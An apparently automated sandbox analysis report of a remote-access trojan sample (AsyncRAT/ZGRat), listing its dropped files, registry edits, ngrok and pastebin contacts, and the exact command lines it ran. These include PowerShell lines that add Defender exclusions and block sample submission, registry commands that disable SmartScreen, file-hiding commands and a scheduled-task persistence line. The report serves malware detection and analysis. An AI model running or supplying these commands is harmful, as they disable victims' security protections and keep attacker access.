Analysis Overview
SHA256
ca047f4682267a1191d703e260b8ac420953985821c328bd80ad766704149ade
Threat Level: Known bad
The file ca047f4682267a1191d703e260b8ac420953985821c328bd80ad766704149ade was found to be: Known bad.
Malicious Activity Summary
ZGRat
AsyncRat
Detect ZGRat V1
Async RAT payload
Command and Scripting Interpreter: PowerShell
Sets file to hidden
Drops startup file
Executes dropped EXE
Checks computer location settings
Loads dropped DLL
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates physical storage devices
Unsigned PE
Suspicious use of SetWindowsHookEx
Views/modifies file attributes
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Modifies registry class
Creates scheduled task(s)
Delays execution with timeout.exe
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-10 02:49
Signatures
Unsigned PE
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-10 02:49
Reported
2024-05-10 02:51
Platform
win7-20240508-en
Max time kernel
150s
Max time network
150s
Command Line
Signatures
AsyncRat
Detect ZGRat V1
ZGRat
Async RAT payload
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target | Count |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A | 6 |
Sets file to hidden
| Description | Indicator | Process | Target | Count |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A | 3 |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hide.exe | C:\Windows\temp\explorer.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hide.exe | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hide.exe | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer .exe | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UPDATE.exe | C:\Windows\SysWOW64\attrib.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UPDATE.exe | C:\Windows\temp\explorer.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UPDATE.exe | C:\Windows\temp\explorer.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer .exe | C:\Windows\temp\explorer.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer .exe | C:\Windows\temp\explorer.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hide.exe | C:\Windows\temp\explorer.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UPDATE.exe | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini | C:\Windows\SysWOW64\attrib.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\__tmp_rar_sfx_access_check_259397152 | C:\Windows\temp\explorer.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer .exe | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer .exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Hide.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\GoogleUpdate.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target | Count |
| N/A | N/A | C:\Windows\temp\explorer.exe | N/A | 12 |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A | 1 |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target | Count |
| N/A | 0.tcp.eu.ngrok.io | N/A | N/A | 3 |
| N/A | pastebin.com | N/A | N/A | 3 |
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\ Storage\microsoft.microsoftedge_8wekyb3d8bbwe | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\ Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\ Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Local Settings | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Local Settings\Software | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Local Settings\Software\Microsoft | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Local Settings\Software\Microsoft\Windows\CurrentVersion | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\ Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter\EnabledV9 = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Local Settings\Software\Microsoft\Windows | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\ Storage | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target | Count |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer .exe | N/A | 1 |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A | 4 |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe | N/A | 1 |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\GoogleUpdate.exe | N/A | 1 |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer .exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\GoogleUpdate.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target | Count |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A | 3 |
Processes
C:\Users\Admin\AppData\Local\Temp\ca047f4682267a1191d703e260b8ac420953985821c328bd80ad766704149ade.exe
"C:\Users\Admin\AppData\Local\Temp\ca047f4682267a1191d703e260b8ac420953985821c328bd80ad766704149ade.exe"
C:\Windows\temp\explorer.exe
"C:\Windows\temp\explorer.exe" -p123
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer .exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer .exe"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Hide.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Hide.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\1B00.tmp\hide.bat" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Hide.exe""
C:\Windows\SysWOW64\attrib.exe
attrib "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.*" +s +h
C:\Windows\SysWOW64\attrib.exe
attrib "C:\Users\Admin\AppData\Roaming\*.*" +s +h
C:\Windows\SysWOW64\attrib.exe
attrib *.* +s +h
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden Add-MpPreference -ExclusionPath 'c:\','d:\','e:\','f:\'.'j:\'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden Add-MpPreference -ExclusionProcess 'explorer .exe','UPDATE.exe','googleupdate.exe'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden Set-MpPreference -SubmitSamplesConsent NeverSend
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\ Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter" /v EnabledV9 /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\AppHost" /v EnableWebContentEvaluation /t REG_DWORD /d 0
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdate" /tr '"C:\Users\Admin\AppData\Roaming\GoogleUpdate.exe"' & exit
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp5DF8.tmp.bat""
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdate" /tr '"C:\Users\Admin\AppData\Roaming\GoogleUpdate.exe"'
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Users\Admin\AppData\Roaming\GoogleUpdate.exe
"C:\Users\Admin\AppData\Roaming\GoogleUpdate.exe"
Network
| Country | Destination | Domain | Proto | Count |
| US | 8.8.8.8:53 | pastebin.com | udp | 1 |
| US | 104.20.3.235:443 | pastebin.com | tcp | 2 |
| US | 8.8.8.8:53 | br1.localto.net | udp | 1 |
| US | 8.8.8.8:53 | 0.tcp.eu.ngrok.io | udp | 3 |
| DE | 3.125.102.39:12586 | 0.tcp.eu.ngrok.io | tcp | 6 |
| DE | 18.192.31.165:12586 | 0.tcp.eu.ngrok.io | tcp | 10 |
| DE | 3.125.223.134:12586 | 0.tcp.eu.ngrok.io | tcp | 2 |
Files
C:\Windows\Temp\explorer.exe
\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UPDATE.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer .exe
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hide.exe
C:\Users\Admin\AppData\Local\Temp\1B00.tmp\hide.bat
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
\??\PIPE\srvsvc
C:\Users\Admin\AppData\Local\Temp\tmp5DF8.tmp.bat
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-10 02:49
Reported
2024-05-10 02:51
Platform
win10v2004-20240426-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
AsyncRat
Detect ZGRat V1
ZGRat
Async RAT payload
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target | Count |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A | 6 |
Sets file to hidden
| Description | Indicator | Process | Target | Count |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A | 3 |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | C:\Windows\temp\explorer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Hide.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer .exe | C:\Windows\temp\explorer.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UPDATE.exe | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UPDATE.exe | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UPDATE.exe | C:\Windows\temp\explorer.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hide.exe | C:\Windows\temp\explorer.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hide.exe | C:\Windows\SysWOW64\attrib.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UPDATE.exe | C:\Windows\temp\explorer.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer .exe | C:\Windows\temp\explorer.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hide.exe | C:\Windows\temp\explorer.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hide.exe | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer .exe | C:\Windows\SysWOW64\attrib.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\__tmp_rar_sfx_access_check_240603328 | C:\Windows\temp\explorer.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer .exe | C:\Windows\SysWOW64\attrib.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer .exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Hide.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\GoogleUpdate.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target | Count |
| N/A | 0.tcp.eu.ngrok.io | N/A | N/A | 3 |
| N/A | pastebin.com | N/A | N/A | 3 |
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\ Storage | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\ Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\ Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter\EnabledV9 = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\ Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\ Storage\microsoft.microsoftedge_8wekyb3d8bbwe | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target | Count |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer .exe | N/A | 1 |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A | 4 |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe | N/A | 1 |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\GoogleUpdate.exe | N/A | 1 |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer .exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\GoogleUpdate.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target | Count |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A | 3 |
Processes
C:\Users\Admin\AppData\Local\Temp\ca047f4682267a1191d703e260b8ac420953985821c328bd80ad766704149ade.exe
"C:\Users\Admin\AppData\Local\Temp\ca047f4682267a1191d703e260b8ac420953985821c328bd80ad766704149ade.exe"
C:\Windows\temp\explorer.exe
"C:\Windows\temp\explorer.exe" -p123
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer .exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer .exe"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Hide.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Hide.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5748.tmp\hide.bat" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Hide.exe""
C:\Windows\SysWOW64\attrib.exe
attrib "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.*" +s +h
C:\Windows\SysWOW64\attrib.exe
attrib "C:\Users\Admin\AppData\Roaming\*.*" +s +h
C:\Windows\SysWOW64\attrib.exe
attrib *.* +s +h
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden Add-MpPreference -ExclusionPath 'c:\','d:\','e:\','f:\'.'j:\'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden Add-MpPreference -ExclusionProcess 'explorer .exe','UPDATE.exe','googleupdate.exe'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden Set-MpPreference -SubmitSamplesConsent NeverSend
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\ Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter" /v EnabledV9 /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\AppHost" /v EnableWebContentEvaluation /t REG_DWORD /d 0
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdate" /tr '"C:\Users\Admin\AppData\Roaming\GoogleUpdate.exe"' & exit
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp9635.tmp.bat""
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdate" /tr '"C:\Users\Admin\AppData\Roaming\GoogleUpdate.exe"'
C:\Users\Admin\AppData\Roaming\GoogleUpdate.exe
"C:\Users\Admin\AppData\Roaming\GoogleUpdate.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | br1.localto.net | udp |
| US | 8.8.8.8:53 | 24.19.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | br1.localto.net | udp |
| US | 8.8.8.8:53 | br1.localto.net | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | br1.localto.net | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | br1.localto.net | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | br1.localto.net | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 0.tcp.eu.ngrok.io | udp |
| DE | 3.125.209.94:12586 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | br1.localto.net | udp |
| DE | 3.125.209.94:12586 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | br1.localto.net | udp |
| DE | 3.125.209.94:12586 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | br1.localto.net | udp |
| DE | 3.125.209.94:12586 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | br1.localto.net | udp |
| US | 8.8.8.8:53 | br1.localto.net | udp |
| DE | 3.125.209.94:12586 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | br1.localto.net | udp |
| US | 8.8.8.8:53 | 0.tcp.eu.ngrok.io | udp |
| DE | 18.192.31.165:12586 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | br1.localto.net | udp |
